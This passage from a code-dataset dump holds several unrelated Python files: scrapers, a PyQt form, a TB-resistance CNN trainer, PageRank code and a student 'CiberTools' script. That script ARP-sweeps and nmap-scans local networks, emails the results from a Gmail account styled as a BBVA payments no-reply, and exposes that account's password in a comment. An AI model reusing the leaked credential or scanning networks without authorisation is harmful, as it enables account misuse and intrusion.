= open('第五卷.txt', 'w+', encoding='utf-8')\nget_page_content()\nfile.close()\ndriver.quit()\n","sub_path":"2019年5月12日/pencil.py","file_name":"pencil.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"651524895","text":"from importa import *\n\n#Espacio de colaboracion de juan daniel\n\n\ndef encrypt():\n hora = ño()\n try:\n comando = \"C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/PIA/CiberTools/26-10-2021/base64.ps1\"\n subprocess.call([\"C://WINDOWS//system32//WindowsPowerShell//v1.0//powershell.exe\",'./base64.ps1'])\n logging.info(hora[0:19]+\" Se ejecuto Encrypt correctamente \")\n except:\n logging.error( hora[0:19] + \" Fallo Encrypt \")\n \n\ndef paiton():\n hora = ño()\n try:\n python = \"C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/PIA/CiberTools/26-10-2021/APIhunter.py\"\n subprocess.call([\"python\",'./APIhunter.py'])\n logging.info(hora[0:19]+\" Se ejecuto APIHUNTER correctamente \")\n except:\n logging.error(hora[0:19]+\" Fallo APIHUNTER \") \n\n# Funcion para la barra de progreso\n\n\ndef ño():\n hora=str(datetime.datetime.now())\n return hora\n\n\ndef barra():\n bar2 = ChargingBar('Obteniendo Datos:', max=100)\n for num in range(100):\n time.sleep(random.uniform(0, 0.1))\n bar2.next()\n bar2.finish()\n\n\n# Argumentos \n\n\ndef argumentos():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-ip\", dest=\"ip_public\",\n help=\"Ingresa la ip, si no pones\" +\n \"nada se tomará automatico 8.8.4.4\")\n parser.add_argument(\"-i\", dest=\"ip_local\", help=\"Ingresa la ip\")\n parser.add_argument(\"-user\", dest=\"user_name\",\n help=\"Ingresa un username para el envio del correo \")\n parser.add_argument(\"-pts\", dest=\"puerto\",default='20-100',\n help=\"Ingresa los puertos a escanear ejemplo --> 80-90 \")\n parser.add_argument(\"-m\", dest=\"msg\",\n help=\"Ingresa el mensaje a enviar \")\n parser.add_argument(\"-dest\", dest=\"numero\",\n help=\"Ingresa el numero a dodne enviaras el mensaje \")\n mensaje = parser.parse_args()\n numero = parser.parse_args()\n puertos = parser.parse_args()\n ip_public = parser.parse_args()\n ip_local = parser.parse_args()\n user = parser.parse_args()\n return ip_local, ip_public, user, puertos, mensaje, numero\n\n\n# Funcion para hacer la llamada a la API de Geolocalizacion\n\n\ndef geolocalizacion(ip_public):\n hora = ño()\n url = \"http://free.ipwhois.io/json/{}\".format(ip_public.ip_public)\n 
barra()\n soup = requests.get(url)\n data = soup.text\n data = soup.json()\n datos = open(\"datos.txt\", \"w\")\n n = 1\n q = 0\n r = 0\n valor = []\n valor2 = []\n wb = openpyxl.Workbook()\n ws = wb.active\n Columna1 = ['A' + str(n)]\n for key in data:\n # que lo escriba en txt\n datos.write(key + \": \" + str(data[key]) + \"\\n\")\n # para guardar el excel\n valor.append(str(key))\n ws.cell(row=r + 1, column=1).value = str(valor[q])\n valor2.append(str(data[key]))\n ws.cell(row=r+1, column=2).value = str(valor2[q])\n n = n + 1\n q = q + 1\n r = r + 1\n wb.save('datoss.xlsx')\n datos.close()\n print(\"Archivo con datos de Geolocalizacion generado con exito \")\n logging.info(hora[0:19]+\" Ejecucion de funcion geolocalizacion correctamente\")\n \n\n\n# Funcion para scanear las ip activas en una red local\n\n\ndef scan(ip_local):\n hora = ño()\n try:\n # Usamos argparser para pasar los argumentos por terminal\n archivo = open(\"ips.txt\", \"w\")\n print(\"Scanning...\")\n # iniciamos el scaneo\n arp_request = scapy.ARP(pdst=ip_local.ip_local+\"/24\")\n brodcast = scapy.Ether(dst=\"ff:ff:ff:ff:ff:ff\")\n arp = brodcast / arp_request\n barra()\n answered = scapy.srp(arp, timeout=1, verbose=False)[0]\n # Guardamos en un txt las ip y las mac addres\n # con un for recorriendo answered\n for element in answered:\n archivo.write(\"IP:{} \".format(element[1].psrc))\n archivo.write(\" MAC address: {}\\n \".format(element[1].hwsrc))\n archivo.close()\n print(\"Archivo con ip´s activas en la\" +\n \"red local ingresada generado con exito\")\n logging.info(hora[0:19]+\" Ejecucion de funcion scan correctamente\")\n correcto = True\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion scan fallo \")\n correcto = False\n return correcto\n\n\n# Se Empieza a leer el archivo que contiene las ip para almacenar en una lista\n\n\ndef Ports(puertos,ip_local):\n hora = ño() \n try:\n archivo=open('puertos_scaneado.txt','w')\n ip_add_pattern = re.compile(\"^(?:[0-9]{1,3}\\.){3}[0-9]{1,3}$\")\n port_range_pattern = re.compile(\"([0-9]+)-([0-9]+)\")\n port_min = 0\n port_max = 65535\n open_ports = []\n while True:\n ip_add_entered = ip_local.ip_local\n if ip_add_pattern.search(ip_add_entered):\n print(f\"{ip_add_entered} is a valid ip address\")\n break\n while True:\n port_range = puertos.puerto\n port_range_valid = port_range_pattern.search(port_range.replace(\" \",\"\"))\n if port_range_valid:\n port_min = int(port_range_valid.group(1))\n port_max = int(port_range_valid.group(2))\n break\n nm = nmap.PortScanner()\n for port in range(port_min, port_max + 1):\n try:\n result = nm.scan(ip_add_entered, str(port))\n port_status = (result['scan'][ip_add_entered]['tcp'][port]['state'])\n archivo.write(nm.csv()+(f\"Port {port} is {port_status}\")+'\\n')\n except:\n print(f\"Cannot scan port {port}.\")\n archivo.close()\n logging.info(hora[0:19]+\" Ejecucion de funcion ports correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion ports fallo\")\n pass\n\n\n# Echale un ojo a esta funcion max y carlos \n\n\ndef my_ip():\n hora = ño()\n try:\n url1 = 'https://www.cual-es-mi-ip.net/'\n # Peticiones a cada uno de los links\n page1 = requests.get(url1)\n soup1 = BeautifulSoup(page1.content, \"html.parser\")\n origen = soup1.find_all(\"span\", class_=\"big-text font-arial\")\n for i in origen:\n ip_public = i.text\n code = page1.status_code\n if code == 200:\n return ip_public\n else:\n ip = ''\n logging.info(hora[0:19]+\" Ejecucion de funcion my_ip correctamente\")\n except:\n 
logging.error(hora[0:19]+\" Ejecucion de funcion my_ip fallo\")\n pass\n\n\ndef enviar_sms(numero,mensaje):\n hora = ño()\n try:\n archivo=open('C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/llaves.txt')\n claves=[]\n lineas = archivo.readlines()\n for linea in lineas:\n claves.append(linea)\n archivo.close()\n accountSID =claves[0]\n authToken = claves[1]\n twilioCli = Client(accountSID,authToken)\n\n myTwilioNumber = claves[2]\n\n destCellPhone = '+52'+numero.numero\n\n msg = mensaje.msg\n message = twilioCli.messages.create(to = destCellPhone,\n from_ = myTwilioNumber,\n body = msg)\n print(message.to)\n logging.info(hora[0:19]+\" Ejecucion de funcion enviar_sms correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion enviar_sms fallo\")\n pass\n\n\n## Lugar de trabajo de carlos\n## Correo que estamos usando paymentsnoreplybbva@gmail.com\n## Fporeladmin1\n\n\ndef enviar_Correo_mamalon(user):\n hora = ño()\n try:\n archivo=open('C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/pass.txt','r')\n contraseña = archivo.readline()\n archivo=open(\"C:/Users/mcdan/OneDrive - Universidad Autonoma de Nuevo León/2020-2021/Desktop/Correos.txt\")\n correos = []\n lineas = archivo.readlines()\n for linea in lineas:\n correos.append(linea.rstrip())\n fromaddr = user.user_name\n password = contraseña\n toaddrs = correos\n\n content = 'Este es el reporte de fin de mes. ' + hora[0:19]\n textApart = MIMEText(content)\n\n\n datosFile = '.\\datos.txt'\n datosApart = MIMEImage(open(datosFile, 'rb').read(), datosFile.split('.')[-1])\n datosApart.add_header('Content-Disposition', 'attachment', filename=\"datos.txt\")\n\n ipsFile = '.\\ips.txt'\n ipsApart = MIMEApplication(open(ipsFile, 'rb').read())\n ipsApart.add_header('Content-Disposition', 'attachment', filename=\"ip's.txt\")\n\n correosFile = '.\\correos.txt'\n correosApart = MIMEApplication(open(correosFile, 'rb').read())\n correosApart.add_header('Content-Disposition', 'attachment', filename=\"correos.txt\")\n\n #uanlFile = '.\\uanl.txt'\n #uanlApart = MIMEApplication(open(uanlFile, 'rb', encoding=\"utf-8\").read())\n #uanlApart.add_header('Content-Disposition', 'attachment', filename=\"uanl.txt\")\n\n infoFile = '.\\info.log'\n infoApart = MIMEApplication(open(infoFile, 'rb').read())\n infoApart.add_header('Content-Disposition', 'attachment', filename=\"info.log\")\n\n\n m = MIMEMultipart()\n m.attach(textApart)\n m.attach(datosApart)\n m.attach(ipsApart)\n m.attach(correosApart)\n #m.attach(uanlApart)\n m.attach(infoApart)\n m['Subject'] = 'Reporte'\n\n try:\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(fromaddr,password)\n server.sendmail(fromaddr, toaddrs, m.as_string())\n print('success')\n server.quit()\n except smtplib.SMTPException as e:\n print ('error:', e) # Error de impresión\n logging.info(hora[0:19]+\" Ejecucion de funcion enviar correo correctamente\")\n except:\n logging.error(hora[0:19]+\" Ejecucion de funcion enviar correo fallo\")\n pass\n","sub_path":"01-11-2021/analisis.py","file_name":"analisis.py","file_ext":"py","file_size_in_byte":10131,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"604306106","text":"import urllib.request\n\nfile = open(\"out.txt\", \"w\")\n\nurl = \"http://annarboradulthockey.com/master_sched_league.php?day=\"\n\n\nd = input(\"Enter The Day: \")\nm = input(\"Enter The Month: \")\ny = 
input(\"Enter The Year: \")\n\nurl += d+\"&month=\"+m+\"&year=\"+y\n\nprint(url)\n\nreq = urllib.request.Request(\n url,\n data=None,\n headers={\n 'User-Agent': 'Mozilla/5.0'\n }\n)\n\nf = urllib.request.urlopen(req)\nhtmlstr = (f.read().decode('utf-8'))\n\narray1 = [\"\"]\n\n#get the schedule table from url and write it to out.txt\ndef getTable(mystr):\n #remove unneeded html\n mystr = mystr[mystr.find(\"
\"):]\n mystr = mystr[:mystr.find(\"
\")]\n\n while(1==1):\n y = mystr.find(\"\")\n if(y == -1):\n break\n array1.append(mystr[:y])\n mystr = mystr[y+4:]\n\n array1.pop(0)\n\ndef formatLine(line):\n visitor = line[line.find(\"- \") + 2:line.find(\" (\")]\n home = line[line.find(\"@ \") + 7:line[line.find(\"@ \"):].find(\" (\") + line.find(\"@ \")]\n location = line[len(line) - 12:len(line) - 5]\n line = visitor + \",\" + home + \",\" + location\n return line\n #print(line)\n\ndef sortarr(arr):\n oc = 0\n sc = 0\n vc = 0\n olympicT = []\n stadiumT = []\n varsityT = []\n for x in arr:\n if(x.find(\"Olympic\") != -1):\n olympicT.append(x[:len(x) - 8])\n if(x.find(\"Stadium\") != -1):\n stadiumT.append(x[:len(x) - 8])\n if(x.find(\"Varsity\") != -1):\n varsityT.append(x[:len(x) - 8])\n\n result = []\n result.append(olympicT)\n result.append(stadiumT)\n result.append(varsityT)\n\n return result\n\n#main calls\ngetTable(htmlstr)\ni= 0\nfor x in array1:\n array1[i] = formatLine(x)\n i += 1\n\n#write to out.txt\narray1 = sortarr(array1)\nfor x in array1:\n file.write(str(len(x)) + \"\\n\")\n\nfor x in array1:\n for y in x:\n file.write(y + \"\\n\")\n file.write(\"\\n\")\n\nfile.close()\n","sub_path":"getSchedule.py","file_name":"getSchedule.py","file_ext":"py","file_size_in_byte":1918,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"623816693","text":"from math import *\nimport turtle as t\n\nt.shape('circle')\nt.speed(1000)\nt.left(90)\nk = 0\ndef infinity():\n for x in range(72):\n t.forward(5 + k)\n t.left(5)\n for y in range(72):\n t.forward(5 + k)\n t.right(5)\nfor i in range(7):\n infinity()\n k += 1\n","sub_path":"turtle/10.py","file_name":"10.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"615293590","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\nclass Ui_Dialog(object):\r\n def setupUi(self, Dialog):\r\n Dialog.setObjectName(\"Dialog\")\r\n Dialog.resize(805, 533)\r\n self.exitButton = QtWidgets.QPushButton(Dialog)\r\n self.exitButton.setGeometry(QtCore.QRect(320, 480, 113, 32))\r\n self.exitButton.setObjectName(\"exitButton\")\r\n self.label = QtWidgets.QLabel(Dialog)\r\n self.label.setGeometry(QtCore.QRect(20, 10, 60, 16))\r\n self.label.setObjectName(\"label\")\r\n self.fileHandlingFrame = QtWidgets.QFrame(Dialog)\r\n self.fileHandlingFrame.setGeometry(QtCore.QRect(20, 30, 631, 81))\r\n self.fileHandlingFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.fileHandlingFrame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.fileHandlingFrame.setObjectName(\"fileHandlingFrame\")\r\n self.openReadButton = QtWidgets.QPushButton(self.fileHandlingFrame)\r\n self.openReadButton.setGeometry(QtCore.QRect(10, 20, 201, 41))\r\n self.openReadButton.setObjectName(\"openReadButton\")\r\n self.filePath = QtWidgets.QTextEdit(self.fileHandlingFrame)\r\n self.filePath.setGeometry(QtCore.QRect(220, 10, 401, 61))\r\n self.filePath.setObjectName(\"filePath\")\r\n self.label_2 = QtWidgets.QLabel(Dialog)\r\n self.label_2.setGeometry(QtCore.QRect(20, 130, 81, 16))\r\n self.label_2.setObjectName(\"label_2\")\r\n self.ductReportFrame = QtWidgets.QFrame(Dialog)\r\n self.ductReportFrame.setGeometry(QtCore.QRect(20, 150, 741, 311))\r\n self.ductReportFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.ductReportFrame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.ductReportFrame.setObjectName(\"ductReportFrame\")\r\n self.runLengthFrame = 
QtWidgets.QFrame(self.ductReportFrame)\r\n self.runLengthFrame.setGeometry(QtCore.QRect(520, 29, 211, 141))\r\n self.runLengthFrame.setFrameShape(QtWidgets.QFrame.StyledPanel)\r\n self.runLengthFrame.setFrameShadow(QtWidgets.QFrame.Raised)\r\n self.runLengthFrame.setObjectName(\"runLengthFrame\")\r\n self.label_4 = QtWidgets.QLabel(self.runLengthFrame)\r\n self.label_4.setGeometry(QtCore.QRect(10, 10, 81, 21))\r\n self.label_4.setObjectName(\"label_4\")\r\n self.diffuserID = QtWidgets.QLineEdit(self.runLengthFrame)\r\n self.diffuserID.setGeometry(QtCore.QRect(90, 10, 113, 21))\r\n self.diffuserID.setObjectName(\"diffuserID\")\r\n self.label_5 = QtWidgets.QLabel(self.runLengthFrame)\r\n self.label_5.setGeometry(QtCore.QRect(10, 40, 71, 21))\r\n self.label_5.setObjectName(\"label_5\")\r\n self.runLength = QtWidgets.QLineEdit(self.runLengthFrame)\r\n self.runLength.setGeometry(QtCore.QRect(90, 40, 113, 21))\r\n self.runLength.setObjectName(\"runLength\")\r\n self.label_6 = QtWidgets.QLabel(self.runLengthFrame)\r\n self.label_6.setGeometry(QtCore.QRect(10, 70, 111, 16))\r\n self.label_6.setObjectName(\"label_6\")\r\n self.longestRunPath = QtWidgets.QTextEdit(self.runLengthFrame)\r\n self.longestRunPath.setGeometry(QtCore.QRect(10, 90, 191, 41))\r\n self.longestRunPath.setObjectName(\"longestRunPath\")\r\n self.label_3 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_3.setGeometry(QtCore.QRect(521, 10, 131, 16))\r\n self.label_3.setObjectName(\"label_3\")\r\n self.label_7 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_7.setGeometry(QtCore.QRect(521, 180, 181, 16))\r\n self.label_7.setObjectName(\"label_7\")\r\n self.label_8 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_8.setGeometry(QtCore.QRect(531, 200, 91, 16))\r\n self.label_8.setObjectName(\"label_8\")\r\n self.label_9 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_9.setGeometry(QtCore.QRect(531, 240, 91, 16))\r\n self.label_9.setObjectName(\"label_9\")\r\n self.label_10 = QtWidgets.QLabel(self.ductReportFrame)\r\n self.label_10.setGeometry(QtCore.QRect(531, 220, 181, 16))\r\n self.label_10.setObjectName(\"label_10\")\r\n self.ductReport = QtWidgets.QTextEdit(self.ductReportFrame)\r\n self.ductReport.setGeometry(QtCore.QRect(10, 20, 491, 251))\r\n self.ductReport.setObjectName(\"ductReport\")\r\n\r\n self.retranslateUi(Dialog)\r\n QtCore.QMetaObject.connectSlotsByName(Dialog)\r\n\r\n def retranslateUi(self, Dialog):\r\n _translate = QtCore.QCoreApplication.translate\r\n Dialog.setWindowTitle(_translate(\"Dialog\", \"Dialog\"))\r\n self.exitButton.setText(_translate(\"Dialog\", \"Exit\"))\r\n self.label.setText(_translate(\"Dialog\", \"Duct File\"))\r\n self.openReadButton.setText(_translate(\"Dialog\", \"Open and Read a Duct File\"))\r\n self.filePath.setText(_translate(\"Dialog\", \"Duct Design Input File 1.txt\"))\r\n self.label_2.setText(_translate(\"Dialog\", \"Duct Report\"))\r\n self.label_4.setText(_translate(\"Dialog\", \"Diffuser ID\"))\r\n self.label_5.setText(_translate(\"Dialog\", \"Run Length\"))\r\n self.label_6.setText(_translate(\"Dialog\", \"Longest Run Path\"))\r\n self.label_3.setText(_translate(\"Dialog\", \"Longest Length Run\"))\r\n self.label_7.setText(_translate(\"Dialog\", \"Contributors to this program:\"))\r\n self.label_8.setText(_translate(\"Dialog\", \"Jason Conway\"))\r\n self.label_9.setText(_translate(\"Dialog\", \"Malorie Travis\"))\r\n self.label_10.setText(_translate(\"Dialog\", \"Abdalrahman (Mann) 
Mansy\"))\r\n\r\n","sub_path":"HW8/Duct_Design.py","file_name":"Duct_Design.py","file_ext":"py","file_size_in_byte":5479,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"327253676","text":"#!/usr/bin/env python\n# coding: utf-8\n\"\"\"\nRuns multitask model with conv-conv-pool architecture, 5 fold cross validation on training/validation set\nThis is the architecture used for the final MD-CNN model\n\nAuthors:\n\tMichael Chen (original version)\n\tAnna G. Green\n\tChang Ho Yoon\n\"\"\"\n\nimport sys\nimport glob\nimport os\nimport yaml\nimport sparse\n\nimport tensorflow as tf\nimport keras.backend as K\nimport numpy as np\nimport pandas as pd\n\nfrom sklearn.metrics import roc_auc_score, average_precision_score\nfrom sklearn.model_selection import KFold, StratifiedKFold\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras import models\nfrom tb_cnn_codebase import *\n\ndef run():\n\n def get_conv_nn():\n \"\"\"\n Define convolutional neural network architecture\n\n NB filter_size is a global variable (int) given by the kwargs\n \"\"\"\n\n\t\t#TODO: replace X.shape with passed argument\n model = models.Sequential()\n\t\t#TODO: add filter size argument\n model.add(layers.Conv2D(\n 64, (5, filter_size),\n data_format='channels_last',\n activation='relu',\n input_shape = X.shape[1:]\n ))\n model.add(layers.Lambda(lambda x: K.squeeze(x, 1)))\n model.add(layers.Conv1D(64, 12, activation='relu'))\n model.add(layers.MaxPooling1D(3))\n model.add(layers.Conv1D(32, 3, activation='relu'))\n model.add(layers.Conv1D(32, 3, activation='relu'))\n model.add(layers.MaxPooling1D(3))\n model.add(layers.Flatten())\n model.add(layers.Dense(256, activation='relu', name='d1'))\n model.add(layers.Dense(256, activation='relu', name='d2'))\n model.add(layers.Dense(13, activation='sigmoid', name='d4'))\n\n opt = Adam(learning_rate=np.exp(-1.0 * 9))\n\n model.compile(optimizer=opt,\n loss=masked_multi_weighted_bce,\n metrics=[masked_weighted_accuracy])\n\n return model\n\n class myCNN:\n \"\"\"\n Class for handling CNN functionality\n\n \"\"\"\n def __init__(self):\n self.model = get_conv_nn()\n self.epochs = N_epochs\n\n def fit_model(self, X_train, y_train, X_val=None, y_val=None):\n \"\"\"\n X_train: np.ndarray\n n_strains x 5 (one-hot) x longest locus length x no. 
of loci\n Genotypes of isolates used for training\n y_train: np.ndarray\n Labels for isolates used for training\n\n X_val: np.ndarray (optional, default=None)\n Optional genotypes of isolates in validation set\n\n y_val: np.ndarray (optional, default=None)\n Optional labels for isolates in validation set\n\n Returns\n -------\n pd.DataFrame:\n training history (accuracy, loss, validation accuracy, and validation loss) per epoch\n\n \"\"\"\n if X_val is not None and y_val is not None:\n history = self.model.fit(\n X_train, y_train,\n epochs=self.epochs,\n validation_data=(X_val, y_val),\n batch_size=128\n )\n print('\\nhistory dict:', history.history)\n return pd.DataFrame.from_dict(data=history.history)\n else:\n history = self.model.fit(X_train, y_train, epochs=self.epochs, batch_size=128)\n print('\\nhistory dict:', history.history)\n return pd.DataFrame.from_dict(data=history.history)\n\n def predict(self, X_val):\n \n return np.squeeze(self.model.predict(X_val))\n\n _, input_file = sys.argv\n\n # load kwargs from config file (input_file)\n kwargs = yaml.safe_load(open(input_file, \"r\"))\n print(kwargs)\n output_path = kwargs[\"output_path\"]\n N_epochs = kwargs[\"N_epochs\"]\n filter_size = kwargs[\"filter_size\"]\n pkl_file = kwargs[\"pkl_file\"]\n\n # Determine whether pickle already exists\n if os.path.isfile(pkl_file):\n print(\"pickle file already exists, proceeding with modeling\")\n else:\n print(\"creating genotype phenotype pickle\")\n make_geno_pheno_pkl(**kwargs)\n\n # # Get data from pickle\n df_geno_pheno = pd.read_pickle(pkl_file)\n print(\"read in the pkl\")\n\n pkl_file_sparse_train = kwargs['pkl_file_sparse_train']\n pkl_file_sparse_test = kwargs['pkl_file_sparse_test']\n #\n if os.path.isfile(pkl_file_sparse_train) and os.path.isfile(pkl_file_sparse_test):\n print(\"X input already exists, loading X\")\n X_sparse_train = sparse.load_npz(pkl_file_sparse_train)\n #X_sparse_test = sparse.load_npz(pkl_file_sparse_test)\n\n else:\n print(\"creating X pickle\")\n X_all = create_X(df_geno_pheno)\n\n X_sparse = sparse.COO(X_all)\n\n X_all = X_sparse.todense()\n assert (X_all.shape[0] == len(df_geno_pheno))\n\n df_geno_pheno = df_geno_pheno.reset_index(drop=True)\n\n train_indices = df_geno_pheno.query(\"category=='set1_original_10202'\").index\n test_indices = df_geno_pheno.query(\"category!='set1_original_10202'\").index\n\n print(\"splitting X pkl\")\n X_sparse_train = X_sparse[train_indices, :]\n X_sparse_test = X_sparse[test_indices, :]\n del X_sparse\n\n #X_sparse_train = sparse.COO(X_train)\n sparse.save_npz(pkl_file_sparse_train, X_sparse_train, compressed=False)\n\n #X_sparse_test = sparse.COO(X_test)\n sparse.save_npz(pkl_file_sparse_test, X_sparse_test, compressed=False)\n\n drugs = ['RIFAMPICIN', 'ISONIAZID', 'PYRAZINAMIDE',\n 'ETHAMBUTOL', 'STREPTOMYCIN', 'LEVOFLOXACIN',\n 'CAPREOMYCIN', 'AMIKACIN', 'MOXIFLOXACIN',\n 'OFLOXACIN', 'KANAMYCIN', 'ETHIONAMIDE',\n 'CIPROFLOXACIN']\n\n y_all_train, y_array = rs_encoding_to_numeric(df_geno_pheno.query(\"category=='set1_original_10202'\"), drugs)\n\n num_drugs = len(drugs)\n\n # obtain phenotype data for CNN\n y_all_train = y_all_train[drugs].values.astype(np.int)\n\n # obtain isolates with at least 1 resistance status to length of drugs\n ind_with_phenotype = np.where(y_all_train.sum(axis=1) != -num_drugs)\n\n X = X_sparse_train[ind_with_phenotype]\n print(\"the shape of X is {}\".format(X.shape))\n\n y = y_all_train[ind_with_phenotype]\n print(\"the shape of y is {}\".format(y.shape))\n\n alpha_matrix_path = 
kwargs[\"alpha_file\"]\n alpha_matrix = load_alpha_matrix(alpha_matrix_path, y_array, df_geno_pheno)\n del df_geno_pheno\n\n\n ### Perform 5-fold cross validation\n cv_splits = 5\n\n cv = KFold(n_splits=cv_splits, shuffle=True, random_state=1)\n\n column_names = ['Algorithm', 'Drug', 'AUC', 'AUC_PR', \"threshold\", \"spec\", \"sens\"]\n results = pd.DataFrame(columns=column_names)\n i = 0\n\n for train_idx, (train, val) in enumerate(cv.split(X, y)):\n model = myCNN()\n X_train = X[train, :].todense()\n X_val = X[val, :].todense()\n y_train = y[train, :]\n y_val = y[val, :]\n\n print('fitting..')\n history = model.fit_model(X_train, alpha_matrix[train, :], X_val, alpha_matrix[val, :])\n history.to_csv(output_path + \"history_cv_split\" + str(train_idx) + \".csv\")\n print('predicting..')\n y_pred = model.predict(X_val)\n\n for idx, drug in enumerate(drugs):\n non_missing_val = np.where(y_val[:, idx] != -1)[0]\n auc_y = np.reshape(y_val[non_missing_val, idx], (len(non_missing_val), 1))\n auc_preds = np.reshape(y_pred[non_missing_val, idx], (len(non_missing_val), 1))\n val_auc = roc_auc_score(auc_y, auc_preds)\n val_auc_pr = average_precision_score(1 - y_val[non_missing_val, idx], 1 - y_pred[non_missing_val, idx])\n val__ = get_threshold_val(y_val[non_missing_val, idx], y_pred[non_missing_val, idx])\n val_threshold = float(val__[\"threshold\"])\n val_spec = val__['spec']\n val_sens = val__['sens']\n\n results.loc[i] = ['CNN', drug, val_auc, val_auc_pr, val_threshold, val_spec, val_sens]\n\n i += 1\n\n K.clear_session()\n\n results.to_csv(output_path + \"_auc.csv\")\n\n\nrun()\n","sub_path":"md_cnn/model_training/run_MDCNN_ccp_crossval.py","file_name":"run_MDCNN_ccp_crossval.py","file_ext":"py","file_size_in_byte":8202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"568305616","text":"import actions_v4 as a\nimport notwatching_v4 as n\nimport addwhitelist_v4 as w \nimport output_v4 as ou\n\nprint('hi')\nq1 = input('Welcome to interaction with me, what do you want to do? DeleteWatch, AddWhite, or AccessEntry ')\n\nif q1 != 'DeleteWatch' and q1 != 'AddWhite' and q1!='AccessEntry':\n print('sorry we are still growing, more functions might be provided later ')\nelse:\n if q1 == 'DeleteWatch':\n q2 = input(\"do you want to delete anything from the watchlist? reply 'yes' or 'no' \")\n if q2 == 'yes':\n ip = input('what is the ip that you dont need to watchlist: ')\n name = input('what is the corresponding username: ')\n n.remove_from_watchlist(ip,name)\n q3 = input(\"do you want to reset the count of this entry? reply 'yes' or 'no' \")\n if q3 == 'yes':\n n.reset_count(ip,name)\n print('you are all set')\n else:\n print('fine')\n ou.output_watchlist()\n elif q1 == 'AddWhite':\n q4 = input('what is the ip that you want to whitelisted: ')\n w.add_whi(q4)\n print('done')\n else:\n q5 = input(\"What is the ip that you want to look up for: \")\n q6 = input(\"Do you know the username? No or [username]\")\n if q6 == 'No':\n # if just want to look up by ip without knowing username \n a.find_ip(q5)\n else:\n q7 = input('which scope? 
(successful,Invalid, FAILED')\n if q7 != 'successful' and q7 != 'Invalid' and q7 != 'FAILED':\n print('No messing around, see ya')\n else:\n a.resume(q5,q6,q7)\n\n","sub_path":"version 4 /interaction_v4.py","file_name":"interaction_v4.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"259905207","text":"\"\"\"Two fast implementations of PageRank:\n An exact solution using a sparse linear system solver,\n and an a power method approximation.\n Both solutions are taking full advantage of sparse matrix calculations.\n\n [Reference]:\n Cleve Moler. 2011. Experiments with MATLAB (Electronic ed.).\n MathWorks, Inc.\n\"\"\"\n# uncomment\nfrom __future__ import division\n\nimport numpy as np\nimport scipy as sp\nimport scipy.sparse as sprs\nimport scipy.spatial\nimport scipy.sparse.linalg\n\n__author__ = \"Armin Sajadi\"\n__copyright__ = \"Copyright 2015, The Wikisim Project\"\n__email__ = \"asajadi@gmail.com\"\n\n\ndef pagerank(A, p=0.85,\n personalize=None, reverse=False):\n \"\"\" Calculates PageRank given a csr graph\n\n Inputs:\n -------\n\n G: a csr graph.\n p: damping factor\n personlize: if not None, should be an array with the size of the nodes\n containing probability distributions.\n It will be normalized automatically\n reverse: If true, returns the reversed-PageRank\n\n outputs\n -------\n\n PageRank Scores for the nodes\n\n \"\"\"\n # In Moler's algorithm, $A_{ij}$ represents the existences of an edge\n # from node $j$ to $i$, while we have assumed the opposite!\n if reverse:\n A = A.T\n\n n, _ = A.shape\n r = np.asarray(A.sum(axis=1)).reshape(-1)\n\n k = r.nonzero()[0]\n\n D_1 = sprs.csr_matrix((1 / r[k], (k, k)), shape=(n, n))\n\n if personalize is None:\n personalize = np.ones(n)\n personalize = personalize.reshape(n, 1)\n s = (personalize / personalize.sum()) * n\n\n I = sprs.eye(n)\n x = sprs.linalg.spsolve((I - p * A.T @ D_1), s)\n\n x = x / x.sum()\n return x\n\n\ndef pagerank_power(A, p=0.85, max_iter=100,\n tol=1e-06, personalize=None, reverse=False):\n \"\"\" Calculates PageRank given a csr graph\n\n Inputs:\n -------\n A: a csr graph.\n p: damping factor\n max_iter: maximum number of iterations\n personlize: if not None, should be an array with the size of the nodes\n containing probability distributions.\n It will be normalized automatically.\n reverse: If true, returns the reversed-PageRank\n\n Returns:\n --------\n PageRank Scores for the nodes\n\n \"\"\"\n # In Moler's algorithm, $G_{ij}$ represents the existences of an edge\n # from node $j$ to $i$, while we have assumed the opposite!\n if reverse:\n A = A.T\n\n n, _ = A.shape\n r = np.asarray(A.sum(axis=1)).reshape(-1)\n\n k = r.nonzero()[0]\n\n D_1 = sprs.csr_matrix((1 / r[k], (k, k)), shape=(n, n))\n\n if personalize is None:\n personalize = np.ones(n)\n personalize = personalize.reshape(n, 1)\n s = (personalize / personalize.sum()) * n\n\n z_T = (((1 - p) * (r != 0) + (r == 0)) / n)[np.newaxis, :]\n W = p * A.T @ D_1\n\n x = s / n\n oldx = np.zeros((n, 1))\n\n iteration = 0\n\n while 